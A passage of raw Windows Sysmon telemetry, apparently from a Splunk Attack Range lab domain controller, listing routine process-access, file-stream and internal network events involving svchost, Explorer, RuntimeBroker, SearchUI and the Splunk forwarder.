10341000x80000000000000009780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-64C5-6064-A500-00000000AE01}43566348C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-64C5-6064-A500-00000000AE01}43566348C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.613{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82774E5738D3F66F7DAA18A449CB2403,SHA256=984C2D5DF8F973E425AA34910FEC16FCB1F5AF6BAD669AF1E0799728F49A567B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:59.003{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1361FBA83374A2FC698BF0B3F73A778,SHA256=777F277A6387F19700FE2A1A5F25BA86120A4BFEC303C20CD4A9892F071AD6C1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000009805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:00.799{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCookies\container.dat2021-03-31 12:06:00.799 23542300x80000000000000009804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:00.034{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245CE6D3B24BA9054784D6A84A87F398,SHA256=02888D8FBFF3E758768F8704F4C7BB5138697611915B67283F87C14E295DAE0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:00.603{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53647-false10.0.1.12-8000- 10341000x80000000000000009839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x80000000000000009833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.627{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT2021-03-31 12:06:01.627 10341000x80000000000000009832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.472{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.472{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000009830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.452{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=9C14D61CF943F5572B1E8EB1F812A532,SHA256=8D482A08CD7E25E299EBA09C7D766671F22E8239C0B2F1ED6C5C7F8184DC4E26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.440{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 